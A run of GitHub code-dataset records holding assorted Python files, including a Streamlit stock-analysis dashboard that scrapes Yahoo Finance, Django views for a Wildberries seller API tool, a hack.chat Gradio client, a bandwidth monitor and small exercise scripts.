parsed_rows.append(parsed_row)\n\n df = pd.DataFrame(parsed_rows)\n st.dataframe(df,800,800)\n\ndef cash_flow(ticker):\n from datetime import datetime\n import lxml\n from lxml import html\n import requests\n import numpy as np\n import pandas as pd\n\n symbol = ticker\n\n url = 'https://finance.yahoo.com/quote/' + symbol + '/cash-flow?p=' + symbol\n\n # Set up the request headers that we're going to use, to simulate\n # a request by the Chrome browser. Simulating a request from a browser\n # is generally good practice when building a scraper\n headers = {\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',\n 'Accept-Encoding': 'gzip, deflate, br',\n 'Accept-Language': 'en-US,en;q=0.9',\n 'Cache-Control': 'max-age=0',\n 'Connection': 'close',\n 'DNT': '1', # Do Not Track Request Header\n 'Pragma': 'no-cache',\n 'Referrer': 'https://google.com',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36'\n }\n\n # Fetch the page that we're going to parse, using the request headers\n # defined above\n page = requests.get(url, headers=headers)\n\n # Parse the page with LXML, so that we can start doing some XPATH queries\n # to extract the data that we want\n tree = html.fromstring(page.content)\n\n # Smoke test that we fetched the page by fetching and displaying the H1 element\n tree.xpath(\"//h1/text()\")\n\n table_rows = tree.xpath(\"//div[contains(@class, 'D(tbr)')]\")\n\n # Ensure that some table rows are found; if none are found, then it's possible\n # that Yahoo Finance has changed their page layout, or have detected\n # that you're scraping the page.\n assert len(table_rows) > 0\n\n parsed_rows = []\n\n for table_row in table_rows:\n parsed_row = []\n el = table_row.xpath(\"./div\")\n\n none_count = 0\n\n for rs in el:\n try:\n (text,) = rs.xpath('.//span/text()[1]')\n parsed_row.append(text)\n except ValueError:\n parsed_row.append(np.NaN)\n none_count += 1\n\n if (none_count < 4):\n parsed_rows.append(parsed_row)\n\n df = pd.DataFrame(parsed_rows)\n st.dataframe(df,800,800)\n\ndef key_fianancials(ticker):\n import requests\n from bs4 import BeautifulSoup\n\n import requests\n from bs4 import BeautifulSoup\n\n url = \"https://finance.yahoo.com/quote/\"+ticker+ \"/key-statistics?p=\"+ticker\n\n headers = {\n \"User-Agent\": \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0\"\n }\n\n soup = BeautifulSoup(requests.get(url, headers=headers).content, \"html.parser\")\n\n for t in soup.select(\"table\"):\n for tr in t.select(\"tr:has(td)\"):\n for sup in tr.select(\"sup\"):\n sup.extract()\n tds = [td.get_text(strip=True) for td in tr.select(\"td\")]\n if len(tds) == 2:\n st.write(\"{:<50} {}\".format(*tds))\nst.header(\"Balance Sheet\")\nbalance_sheet(ticker)\nst.header(\"Key Financials\")\nfinancials(ticker)\nst.header(\"Cash Flow\")\ncash_flow(ticker)\nst.header(\"Key Indicators\")\nkey_fianancials(ticker)\n\n\n\n\n\n\nfig = go.Figure(\n data=[go.Candlestick(\n x=df.index,\n open=df['Open'],\n high=df['High'],\n low=df['Low'],\n close=df['Close'],\n increasing_line_color='green',\n decreasing_line_color='red'\n )]\n)\n\nst.subheader(\"Historical Prices\")\nst.write(df.head(15))\n\nst.subheader(\"Data Statistics\")\nst.write(df.describe())\n\nst.subheader(\"Historical Price Chart - Adjusted Close Price\")\nst.line_chart(df['Adj Close'])\n\nst.subheader(\"Volume\")\nst.bar_chart(df['Volume'])\n\nst.subheader(\"Candlestick Trend\")\n#d1 = candle_trend(df, patterns)\n#st.dataframe(d1)\n\nst.subheader(\"Candlestick Chart\")\nst.plotly_chart(fig)\n\ndef garch(stock_data):\n import math\n stock_data['Return'] = 100 * (stock_data['Close'].pct_change())\n stock_data.dropna(inplace=True)\n\n fig = plt.figure()\n fig.set_figwidth(12)\n plt.plot(stock_data['Return'], label='Daily Returns')\n plt.legend(loc='upper right')\n plt.title('Daily Returns Over Time')\n plt.show()\n st.pyplot(fig)\n daily_volatility = stock_data['Return'].std()\n st.write('Daily volatility: ', '{:.2f}%'.format(daily_volatility))\n\n monthly_volatility = math.sqrt(21) * daily_volatility\n st.write('Monthly volatility: ', '{:.2f}%'.format(monthly_volatility))\n\n annual_volatility = math.sqrt(252) * daily_volatility\n st.write('Annual volatility: ', '{:.2f}%'.format(annual_volatility))\n\n garch_model = arch_model(stock_data['Return'], p=1, q=1,\n mean='constant', vol='GARCH', dist='normal')\n\n gm_result = garch_model.fit(disp='off')\n st.dataframe(gm_result.params)\n\n print('\\n')\n\n gm_forecast = gm_result.forecast(horizon=5)\n st.dataframe(gm_forecast.variance[-1:])\n\n rolling_predictions = []\n test_size = 365\n\n for i in range(test_size):\n train = stock_data['Return'][:-(test_size - i)]\n model = arch_model(train, p=1, q=1)\n model_fit = model.fit(disp='off')\n pred = model_fit.forecast(horizon=1)\n rolling_predictions.append(np.sqrt(pred.variance.values[-1, :][0]))\n\n rolling_predictions = pd.Series(rolling_predictions, index=stock_data['Return'].index[-365:])\n\n plt.figure(figsize=(10, 4))\n plt.plot(rolling_predictions)\n plt.title('Rolling Prediction')\n plt.show()\n st.line_chart(rolling_predictions)\n\n\ngarch(df)\n\n\ndf['EWMA12'] = df['Close'].ewm(span=12,adjust=False).mean()\ndf['12-month-SMA'] = df['Close'].rolling(window=12).mean()\nst.line_chart(df[['Close','EWMA12','12-month-SMA']])\n","repo_name":"sudhinjac/Stock","sub_path":"port1.py","file_name":"port1.py","file_ext":"py","file_size_in_byte":17534,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"27078077333","text":"#import class library so that everytime its called, you can call it as tk\nimport tkinter as tk\n\n#define a function to implement print function\ndef button_click():\n print(\"Button clicked!\")\n\n#create root window object\nroot = tk.Tk()\nroot.title(\"Button Example\")\n\n#create button object\n#three arguments in parameter; put button in root window, set the txt, \n#set function in which button will click for \nbutton = tk.Button(root,text=\"Click Me!\", command=button_click)\nbutton.pack()\n\n#keep root window open; call root object\nroot.mainloop()\n \n\n\n\n","repo_name":"danavasilchuk/HelloDana.py","sub_path":"button1010.py","file_name":"button1010.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"556950380","text":"from secedgar.cik_lookup import get_cik_map\r\nimport pandas as pd\r\nfrom secedgar.core import DailyFilings, QuarterlyFilings\r\nfrom datetime import date\r\n\r\ncik_map = get_cik_map()\r\ncik_map = pd.DataFrame.from_dict(cik_map['ticker'], orient='index')\r\n# cik_map.reset_index(inplace=True)\r\n# cik_map.columns = ['company_name', 'cik']\r\n# print(cik_map.company_name)\r\n# print(cik_map.index[0])\r\n\r\n# headers = {\r\n# \"User-Agent\": \"jo boulement jo@gmx.at\",\r\n# \"Accept-Encoding\": \"gzip, deflate\" \r\n# }\r\n\r\ndef get_company_a_filings(cik_map):\r\n for i in range(len(cik_map)):\r\n if (cik_map.index[i] == \"AAPL\"):\r\n print(cik_map.index[i])\r\n return cik_map.index[i] == \"AAPL\"\r\n # return cik_map.company_name == \"AAPL\"\r\n\r\n# get_company_a_filings(cik_map)\r\n\r\nd = QuarterlyFilings(year=2021,\r\n quarter=2,\r\n entry_filter=get_company_a_filings(cik_map),\r\n user_agent= \"jo boulement jo@gmx.at\")\r\n\r\nprint(d.get_urls())","repo_name":"luna-007/extra","sub_path":"edgar_test.py","file_name":"edgar_test.py","file_ext":"py","file_size_in_byte":989,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"21630216700","text":"import concurrent.futures\nimport datetime\nimport json\nimport logging\nimport pickle\nfrom multiprocessing.pool import ThreadPool\nfrom rest_framework.decorators import api_view\n\nfrom django.contrib.auth.decorators import login_required\nfrom django.core.paginator import Paginator\nfrom django.http import HttpResponse, JsonResponse\nfrom django.shortcuts import render\nfrom loguru import logger\nfrom drf_yasg import openapi\nfrom drf_yasg.utils import swagger_auto_schema\nfrom _settings.settings import redis_client\nfrom wb.forms import ApiForm\nfrom wb.models import ApiKey\nfrom wb.services.filtering import (\n filter_marketplace_products,\n filter_warehouse_products,\n filtering_lambdas_marketplace,\n filtering_lambdas_warehouse,\n)\nfrom wb.services.json_encoder import ObjectDict\nfrom wb.services.marketplace import (\n get_marketplace_objects,\n update_marketplace_prices,\n update_marketplace_sales,\n update_warehouse_prices,\n)\nfrom wb.services.rest_client.standard_client import StandardApiClient\nfrom wb.services.search import search_warehouse_products\nfrom wb.services.sorting import (\n get_marketplaces_sorting,\n sort_marketplace_products,\n sort_products,\n sorting_lambdas,\n)\nfrom wb.services.statistics import get_sales_statistics, get_stock_statistics\nfrom wb.services.tools import api_key_required\nfrom wb.services.warehouse import (\n add_weekly_orders,\n add_weekly_sales,\n get_bought_products,\n get_ordered_products,\n get_stock_objects,\n get_stock_products, attach_images,\n)\n\n\ndef index(request):\n # https://images.wbstatic.net/portal/education/Kak_rabotat'_s_servisom_statistiki.pdf\n # https://suppliers-api.wildberries.ru/swagger/index.html\n # https://openapi.wb.ru/\n return render(request, \"index.html\", {})\n\n\n@login_required\n@api_key_required\ndef update_discount(request):\n tokens = ApiKey.objects.get(user=request.user)\n jwt_token = tokens.new_api\n x64_token = tokens.api\n timezone = 3 # Moscow time\n\n if not jwt_token:\n return HttpResponse(\"Нужно указать API-ключ!\")\n\n new_client = StandardApiClient(jwt_token)\n wb_id = request.GET.get(\"wb_id\")\n\n new_price = int(request.GET.get(\"new_price\"))\n if new_price:\n full_price = int(request.GET.get(\"full_price\"))\n new_discount = int(100 - new_price * 100 / full_price)\n logger.info(f\"Посчитана скидка в {new_discount}%\")\n else:\n new_discount = int(request.GET.get(\"new_discount\"))\n if new_discount is not None:\n success, message = new_client.update_discount(wb_id, new_discount)\n if success:\n redis_key = f\"{x64_token}:update_discount:{wb_id}\"\n now = datetime.datetime.now(\n datetime.timezone(datetime.timedelta(hours=timezone))\n )\n logger.info(f\"{now}, {datetime.datetime.now()}\")\n redis_value = pickle.dumps(\n {\n \"new_price\": new_price,\n \"new_discount\": new_discount,\n # A bit creepy way to introduce timezone +3 MSK\n \"modified_at\": datetime.datetime.now(\n datetime.timezone(datetime.timedelta(hours=timezone))\n ),\n }\n )\n redis_client.set(\n redis_key, redis_value, ex=60 * 60 * 24 * 14\n ) # Keep info about price change for 14 days\n return HttpResponse(f\"Установлена {new_discount}% скидка\")\n return HttpResponse(message)\n\n\n@login_required\n@api_key_required\ndef stock(request):\n \"\"\"Display products in stock.\"\"\"\n logger.info(\"View: requested stock\")\n statistics_token = ApiKey.objects.get(user=request.user.id).api\n standard_token = ApiKey.objects.get(user=request.user.id).new_api\n\n # Statistics have 3 requests that take 30+ seconds, so we start another thread pool here\n # Tread doesn't support return value!\n pool = ThreadPool(processes=1)\n async_result = pool.apply_async(get_sales_statistics, (statistics_token,))\n # and actually 3 more threads inside. Magic!\n\n # So here actually we have 4 concurrent requests\n products = get_stock_objects(statistics_token)\n products = add_weekly_sales(statistics_token, products)\n products = add_weekly_orders(statistics_token, products)\n products = update_warehouse_prices(statistics_token, products)\n products = attach_images(standard_token, products)\n products = list(products.values())\n\n sort_by = request.GET.get(\"sort_by\")\n\n products = sort_products(products, sort_by)\n\n filter_by = request.GET.get(\"filter_by\")\n if filter_by:\n products = filter_warehouse_products(products, filter_by)\n\n search_keyword = request.GET.get(\"search\")\n if search_keyword:\n products = search_warehouse_products(products, search_keyword)\n\n # Ready to paginate\n paginator = Paginator(products, 32)\n page_number = request.GET.get(\"page\")\n page_obj = paginator.get_page(page_number)\n\n # Get our statistics\n data = async_result.get()\n\n data[\"data\"] = page_obj\n data = data | get_stock_statistics(products)\n data[\"sorting_lambdas\"] = sorting_lambdas\n data[\"filtering_lambdas\"] = filtering_lambdas_warehouse\n\n return render(\n request,\n \"stock.html\",\n data,\n )\n\n\nx64_token = openapi.Parameter(\n \"x64_token\",\n openapi.IN_QUERY,\n description=\"x64_token https://seller.wb.ru/supplier-settings/access-to-api\",\n type=openapi.TYPE_STRING,\n)\njwt_token = openapi.Parameter(\n \"jwt_token\",\n openapi.IN_QUERY,\n description=\"jwt_token https://seller.wb.ru/supplier-settings/access-to-new-api\",\n type=openapi.TYPE_STRING,\n)\n\n\n@swagger_auto_schema(method=\"get\", manual_parameters=[x64_token])\n@api_view(http_method_names=[\"GET\"])\ndef api_stock(request):\n if \"x64_token\" not in request.GET:\n return JsonResponse({\"error\": \"x64_token is not provided\"})\n token = request.GET[\"x64_token\"]\n products = get_stock_objects(token)\n products = add_weekly_sales(token, products)\n products = add_weekly_orders(token, products)\n products = update_warehouse_prices(token, products)\n return JsonResponse(products, encoder=ObjectDict, json_dumps_params={\"indent\": 4})\n\n\n@login_required\n@api_key_required\ndef marketplace(request):\n \"\"\"Display products in marketplace.\"\"\"\n logger.info(\"View: requested marketplace\")\n tokens = ApiKey.objects.get(user=request.user)\n jwt_token = tokens.new_api\n x64_token = tokens.api\n\n # Statistics have 3 requests that take 30+ seconds, so we start another thread pool here\n # Tread doesn't support return value!\n pool = ThreadPool(processes=1)\n async_result = pool.apply_async(get_sales_statistics, (x64_token,))\n # and actually 3 more threads inside. Magic!\n\n # So here actually we have 4 concurrent requests\n products, barcode_hashmap = get_marketplace_objects(x64_token)\n products = update_marketplace_prices(x64_token, products)\n products = update_marketplace_sales(jwt_token, products, barcode_hashmap)\n products = attach_images(jwt_token, products)\n\n products = list(products.values())\n sort_by = request.GET.get(\"sort_by\")\n products = sort_marketplace_products(products, sort_by)\n\n filter_by = request.GET.get(\"filter_by\")\n if filter_by:\n products = filter_marketplace_products(products, filter_by)\n\n search_keyword = request.GET.get(\"search\")\n if search_keyword:\n products = search_warehouse_products(products, search_keyword)\n # Ready to paginate\n paginator = Paginator(products, 32)\n page_number = request.GET.get(\"page\")\n page_obj = paginator.get_page(page_number)\n\n # Get our weekly revenue and sales/orders\n data = async_result.get()\n\n data[\"data\"] = page_obj\n\n data = data | get_stock_statistics(products)\n data[\"sorting_lambdas\"] = get_marketplaces_sorting()\n data[\"filtering_lambdas\"] = filtering_lambdas_marketplace\n\n data[\"marketplace\"] = True\n\n return render(\n request,\n \"stock.html\",\n data,\n )\n\n\n@swagger_auto_schema(method=\"get\", manual_parameters=[x64_token, jwt_token])\n@api_view(http_method_names=[\"GET\"])\ndef api_marketplace(request):\n if \"x64_token\" not in request.GET or \"jwt_token\" not in request.GET:\n return JsonResponse({\"error\": \"x64_token or jwt_token are not provided\"})\n x64_token = request.GET[\"x64_token\"]\n jwt_token = request.GET[\"jwt_token\"]\n products, barcode_hashmap = get_marketplace_objects(x64_token)\n products = update_marketplace_prices(x64_token, products)\n products = update_marketplace_sales(jwt_token, products, barcode_hashmap)\n\n return JsonResponse(products, encoder=ObjectDict, json_dumps_params={\"indent\": 4})\n\n\n@login_required\n@api_key_required\ndef ordered(request):\n return render_page(get_ordered_products, request)\n\n\ndef render_page(function, request):\n # Statistics have 3 requests that take 30+ seconds, so we start another thread pool here\n # Tread doesn't support return value!\n token = ApiKey.objects.get(user=request.user.id).api\n pool = ThreadPool(processes=1)\n async_result = pool.apply_async(get_sales_statistics, (token,))\n # and actually 3 more threads inside. Magic!\n\n data = function(token)\n sorted_by_date = sorted(data, key=lambda x: x[\"date\"], reverse=True)\n paginator = Paginator(sorted_by_date, 32)\n page_number = request.GET.get(\"page\")\n page_obj = paginator.get_page(page_number)\n\n # Get our statistics\n data = async_result.get()\n\n data[\"data\"] = page_obj\n\n return render(\n request,\n \"ordered.html\",\n data,\n )\n\n\n@login_required\n@api_key_required\ndef bought(request):\n return render_page(get_bought_products, request)\n\n\n@login_required\ndef api(request):\n logger.info(\"Api page requested...\")\n\n if ApiKey.objects.filter(user=request.user.id).exists():\n api = ApiKey.objects.get(user=request.user.id)\n else:\n api = None\n form = ApiForm(request.POST or None, instance=api)\n if form.is_valid():\n form.instance.user = request.user\n form.save()\n return render(request, \"api.html\", {\"form\": form, \"api\": api})\n\n\n@login_required\n@api_key_required\ndef weekly_orders_summary(request):\n # Statistics have 3 requests that take 30+ seconds, so we start another thread pool here\n # Tread doesn't support return value!\n token = ApiKey.objects.get(user=request.user.id).api\n pool = ThreadPool(processes=1)\n async_result = pool.apply_async(get_sales_statistics, (token,))\n # and actually 3 more threads inside. Magic!\n\n with concurrent.futures.ThreadPoolExecutor() as executor:\n logger.info(\"Concurrent analytics dicts\")\n future1 = executor.submit(\n get_ordered_products, token=token, week=False, flag=0, days=14\n )\n future2 = executor.submit(get_stock_as_dict, request)\n data = future1.result()\n stock = future2.result()\n logger.info(\"We've got STOCK and DATA\")\n\n combined = dict()\n to_order = request.GET.get(\"to_order\", False)\n\n for item in data:\n\n wb_id = item[\"nmId\"]\n sku = item[\"supplierArticle\"]\n size = item[\"techSize\"]\n qty = item.get(\"quantity\", 0)\n stock_data = stock.get(wb_id, {\"stock\": 0})\n\n if wb_id not in combined:\n combined[wb_id] = {\n \"sizes\": {size: qty},\n \"total\": qty,\n \"sku\": sku,\n \"stock\": stock_data.get(\"stock\", 0),\n \"stock_sizes\": stock_data.get(\"sizes\", dict()),\n }\n else:\n editing = combined[wb_id] # this is pointer to object in memory\n editing[\"sizes\"][size] = editing[\"sizes\"].get(size, 0) + qty\n editing[\"total\"] += qty\n editing[\"stock_sizes\"] = (stock_data.get(\"sizes\", dict()),)\n\n unsorted_data = tuple(combined.items())\n sorted_data = sorted(unsorted_data, key=lambda x: x[1][\"total\"], reverse=True)\n if to_order:\n sorted_data = tuple(\n filter(lambda x: x[1][\"total\"] > x[1][\"stock\"], sorted_data)\n )\n paginator = Paginator(sorted_data, 32)\n page_number = request.GET.get(\"page\")\n page_obj = paginator.get_page(page_number)\n\n # Get our statistics\n data = async_result.get()\n data[\"data\"] = page_obj\n\n return render(\n request,\n \"summary.html\",\n data,\n )\n\n\ndef get_stock_as_dict(request):\n \"\"\"Must be rewritten with saving to DB\"\"\"\n logger.info(\"Getting stock as dict\")\n token = ApiKey.objects.get(user=request.user.id).api\n stock = get_stock_products(token)\n stock_as_dict = dict()\n for item in stock:\n key = item[\"nmId\"] # wb_id\n price = int(item[\"Price\"] * ((100 - item[\"Discount\"]) / 100))\n data = {\n \"wb_id\": item[\"nmId\"],\n \"sku\": item[\"supplierArticle\"],\n \"price\": price,\n }\n data = stock_as_dict.get(key, data)\n\n data[\"in\"] = data.get(\"in\", 0) + item.get(\"inWayToClient\",0)\n data[\"out\"] = data.get(\"out\", 0) + item.get(\"inWayFromClient\",0)\n data[\"stock\"] = data.get(\"stock\", 0) + item.get(\"quantityFull\",0)\n\n sizes = data.get(\"sizes\", dict())\n size = item.get(\"techSize\", 0)\n sizes[size] = sizes.get(size, 0) + item.get(\"quantityFull\",0)\n\n data[\"sizes\"] = sizes\n stock_as_dict[key] = data\n\n logging.warning(stock_as_dict.get(11034009, None))\n\n return stock_as_dict\n\n\n@login_required\n@api_key_required\ndef add_to_cart(request):\n cart = json.loads(request.session.get(\"json_cart2\", \"{}\"))\n\n wb_id = request.GET.get(\"wb_id\")\n qty = request.GET.get(\"qty\")\n sku = request.GET.get(\"sku\")\n size = request.GET.get(\"size\")\n update = request.GET.get(\"update\", False)\n logging.warning(sku)\n\n item = cart.get(wb_id, dict())\n item[\"sku\"] = sku\n sizes = item.get(\"sizes\", dict())\n if update:\n sizes[size] = int(qty)\n else:\n sizes[size] = sizes.get(size, 0) + int(qty)\n if sizes[size] == 0:\n sizes.pop(size, None)\n if not sizes:\n cart.pop(wb_id, None)\n else:\n item[\"sizes\"] = sizes\n cart[wb_id] = item\n\n request.session[\"json_cart2\"] = json.dumps(cart)\n return HttpResponse(len(cart))\n\n\n@login_required\n@api_key_required\ndef cart(request):\n cart = json.loads(request.session.get(\"json_cart2\", \"{}\"))\n logging.warning(cart)\n cart = tuple(cart.items())\n logging.warning(cart)\n paginator = Paginator(cart, 32)\n page_number = request.GET.get(\"page\")\n page_obj = paginator.get_page(page_number)\n data = dict()\n data[\"data\"] = page_obj\n\n return render(\n request,\n \"cart.html\",\n data,\n )\n","repo_name":"matacoder/wildberries-rest-api","sub_path":"wb/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":14754,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"75"} +{"seq_id":"38809917688","text":"from sys import path\npath.append(r'..\\ksoc_wifi_connection\\ksoc_wifi_connection')\nfrom ksoc_connection import *\nimport time\n\nHOST = '192.168.2.1'\nPORT = 80\n\nif __name__ == '__main__':\n integration = KKTIntegration(KKTVComPortConnection(timeout=1))\n integration.connectDevice()\n print(f'Chirp ID : {integration.getChipID()[1]}')\n read = integration.readHWRegister(0x50000530)\n print(f'read reg ({hex(0x50000504)}) : {read[0]} {hex(read[1])}')\n print(f'write reg ({hex(0x50000504)}) : {integration.writeHWRegister(0x50000504, 0x00000000)}')\n read = integration.readHWRegister(0x50000504)\n print(f'read reg ({hex(0x50000504)}) : {read[0]} {hex(read[1])}')\n # integration.setPowerSavingMode(2)\n # print(f'power saving mode: {integration.getPowerSavingMode()[1]}')\n integration.switchCollectionOfMultiResults(actions=0b1, read_interrupt=0, clear_interrupt=0, raw_size=(8192+2)*2, ch_of_RBank=1, reg_address=[])\n s = time.time_ns()\n for i in range(20):\n print(f'=================={i}==================')\n data = integration.getMultiResults()[1]\n print(f'getMultiResults : {data[0][:4].hex(\" \")}')\n print(f'getMultiResults time : {(time.time_ns()-s)/1000000} ms')\n s = time.time_ns()\n\n\n print(integration.switchCollectionOfMultiResults(actions=0b0, read_interrupt=0, clear_interrupt=0, raw_size=(8192 + 2) * 2,\n ch_of_RBank=1, reg_address=[]))\n\n integration.disconnectDevice()\n\n","repo_name":"lianyun0502/KSOC_Connection","sub_path":"example/get_168_results.py","file_name":"get_168_results.py","file_ext":"py","file_size_in_byte":1496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"14658142891","text":"from win32con import NULL\r\nfrom process_interface import ProcessInterface\r\nfrom infobox import InfoBoxClass\r\nfrom JSONMethods import JSON\r\nfrom OptionsMenu import Options\r\nimport os, sys\r\n\r\nprocess = ProcessInterface()\r\ninfo = InfoBoxClass\r\noptions = Options\r\nJayson = JSON\r\n\r\nfileName = \"DS3C_Savedata\"\r\njsonData = {}\r\nsendToDir = os.getenv('APPDATA')\r\npath = \"./\"\r\n\r\nfonts = []\r\nimport matplotlib.font_manager as fm\r\nfor f in fm.fontManager.ttflist: # lists all font families\r\n fonts.append(f.name)\r\n\r\nontop = False\r\nontop2 = False\r\nfirstclick = True\r\n\r\nfileName = \"DS3C_Savedata\"\r\nactualData = 0\r\ncolourCodeFont = \"white\"\r\ncolourCodeBack = \"green\"\r\ntxtFont = \"Comic Sans MS\"\r\nconnectedToGame = True # for when program loses connection to the game after connecting to it\r\nlookForGame = NULL\r\n\r\ndef resource_path(relative_path):\r\n \"\"\" Get absolute path to resource, works for dev and for PyInstaller \"\"\"\r\n try: \r\n # PyInstaller creates a temp folder and stores path in _MEIPASS # thanks stackoverflow :)\r\n base_path = sys._MEIPASS\r\n except Exception:\r\n base_path = os.path.abspath(\".\")\r\n\r\n return os.path.join(base_path, relative_path)\r\n","repo_name":"KarolWasTaken/DS3C","sub_path":"variables.py","file_name":"variables.py","file_ext":"py","file_size_in_byte":1212,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"17698856874","text":"import gradio as gr\nimport random\nimport time\nimport websocket,json\n\nws=websocket.create_connection('wss://hack.chat/chat-ws')\n\nwith gr.Blocks() as demo:\n _chat_history=None\n chatbot = gr.Chatbot()\n msg = gr.Textbox()\n mynick = gr.Textbox(label='Nick first')\n\n def respond(message, chat_history):\n global _chat_history\n ws.send(json.dumps({'cmd':'chat','text':message}))\n chat_history.append((message,None))\n _chat_history=chat_history\n return \"\", chat_history\n \n def join(nick):\n ws.send(json.dumps({'cmd':'join','nick':nick,'channel':'your-channel'}))\n return None\n\n\n def get_plot(mynick,chat_history):\n data=json.loads(ws.recv())\n\n if data['cmd']=='chat':\n nick=data['nick']\n if nick==mynick:\n print('hm')\n return _chat_history\n text=data['text']\n trip=data.get('trip')\n _text=str(trip)+' '+nick+':\\n'+text\n chat_history.append(( None,_text))\n\n elif data['cmd']=='onlineAdd':\n nick=data['nick']\n trip=data.get('trip')\n _text='* '+str(trip)+' '+nick+' joined'\n chat_history.append(( None,_text))\n\n elif data['cmd']=='onlineRemove':\n nick=data['nick']\n _text='* '+nick+' left'\n chat_history.append(( None,_text))\n\n elif data['cmd']=='updateUser':\n nick=data['nick']\n _text='* '+nick+' updated'\n chat_history.append(( None,_text))\n\n elif data['cmd']=='warn':\n text=data['text']\n _text='! '+text\n chat_history.append(( None,_text))\n\n elif data['cmd']=='info':\n text=data['text']\n _text='** '+text\n chat_history.append(( None,_text))\n\n elif data['cmd']=='emote':\n text=data['text']\n _text='*** '+text\n chat_history.append(( None,_text))\n\n else:\n chat_history.append(( None,json.dumps(data)))\n\n return chat_history\n\n\n msg.submit(respond, [msg, chatbot], [msg, chatbot])\n mynick.submit(join, mynick, None, queue=False)\n dep = demo.load(get_plot, [mynick,chatbot], chatbot, every=1)\n\n\n\nif __name__ == \"__main__\":\n demo.queue().launch()\n\n","repo_name":"huolongguo1O/HCGradio","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"32154373567","text":"# Given the root of a binary tree, return all root-to-leaf paths in any order.\n\n# A leaf is a node with no children.\n\n# Recurivse DFS\n\nclass Solution:\n def binaryTreePaths(self, root: Optional[TreeNode]) -> List[str]:\n if not root: return \"\"\n res = []\n self.dfsHelper(root, \"\", res)\n return res\n\n def dfsHelper(self, root, tempPath, res):\n if not root: return\n \n if not root.left and not root.right:\n res.append(tempPath + str(root.val))\n return\n \n if root.left:\n self.dfsHelper(root.left, tempPath + str(root.val) + \"->\", res)\n \n if root.right:\n self.dfsHelper(root.right, tempPath + str(root.val) + \"->\", res)\n\n\n# Iterative DFS:\n\nclass Solution(object):\n def binaryTreePaths(self, root):\n if not root: return \"\"\n stack = [(root, \"\")]\n res = []\n \n while stack:\n node, curPath = stack.pop()\n if not node.left and not node.right:\n res.append(curPath + str(node.val))\n if node.left:\n stack.append((node.left, curPath + str(node.val) + \"->\"))\n if node.right:\n stack.append((node.right, curPath + str(node.val) + \"->\"))\n return res\n","repo_name":"Dhaaaf/Leetcoding","sub_path":"257.binaryTreePaths.py","file_name":"257.binaryTreePaths.py","file_ext":"py","file_size_in_byte":1285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"70700565361","text":"# Impor pustaka yang dibutuhkan\nimport time\nimport psutil\nimport plotly.graph_objects as go\n\n# Buat variabel untuk menyimpan data bandwidth\nbandwidth_data = {\"time\": [], \"upload\": [], \"download\": []}\n\n# Buat fungsi untuk mengubah byte menjadi megabit\ndef convert_to_mbit(value):\n return value / 1024 / 1024 * 8\n\n# Buat fungsi untuk mengirim data bandwidth ke plotly\ndef send_data():\n # Buat objek grafik garis dengan data bandwidth\n fig = go.Figure()\n fig.add_trace(go.Scatter(x=bandwidth_data[\"time\"], y=bandwidth_data[\"upload\"], mode=\"lines\", name=\"Upload\"))\n fig.add_trace(go.Scatter(x=bandwidth_data[\"time\"], y=bandwidth_data[\"download\"], mode=\"lines\", name=\"Download\"))\n\n # Atur judul dan label sumbu grafik\n fig.update_layout(title=\"Bandwidth Monitor\", xaxis_title=\"Time\", yaxis_title=\"Speed (Mbps)\")\n\n # Tampilkan grafik di browser\n fig.show()\n\n# Tentukan interval waktu dalam detik\ninterval = 1\n\n# Tentukan durasi pengukuran dalam detik\nduration = 10\n\n# Tentukan waktu mulai pengukuran\nstart_time = time.time()\n\n# Ulangi pengukuran selama durasi yang ditentukan\nwhile time.time() - start_time < duration:\n # Dapatkan jumlah byte yang dikirim dan diterima pada waktu sekarang\n net1 = psutil.net_io_counters()\n\n # Tunggu selama interval waktu\n time.sleep(interval)\n\n # Dapatkan jumlah byte yang dikirim dan diterima pada waktu berikutnya\n net2 = psutil.net_io_counters()\n\n # Hitung kecepatan upload dan download dalam megabit per detik\n upload = convert_to_mbit(net2.bytes_sent - net1.bytes_sent) / interval\n download = convert_to_mbit(net2.bytes_recv - net1.bytes_recv) / interval\n\n # Cetak kecepatan upload dan download di konsol\n print(f\"Upload: {upload:.2f} Mbps, Download: {download:.2f} Mbps\")\n\n # Simpan data bandwidth ke variabel\n bandwidth_data[\"time\"].append(time.strftime(\"%H:%M:%S\"))\n bandwidth_data[\"upload\"].append(upload)\n bandwidth_data[\"download\"].append(download)\n\n# Kirim data bandwidth ke plotly untuk divisualisasikan\nsend_data()","repo_name":"pang53rut/ptyhon","sub_path":"Latihan python/link_list.py","file_name":"link_list.py","file_ext":"py","file_size_in_byte":2028,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"5615452262","text":"from data_access.internet import send_get_request_with_header, send_delete_request_with_header\n\nfrom utils.debug_utils import print_to_console, LOG_ALL_MARKET_RELATED_CRAP, get_logging_level, \\\n ERROR_LOG_FILE_NAME, LOG_ALL_DEBUG, DEBUG_LOG_FILE_NAME\n\nfrom utils.key_utils import signed_body_256\nfrom utils.time_utils import get_now_seconds_utc_ms\nfrom utils.file_utils import log_to_file\n\nfrom binance.constants import BINANCE_CANCEL_ORDER, BINANCE_DEAL_TIMEOUT, BINANCE_GET_ALL_TRADES\nfrom binance.error_handling import is_error\nfrom 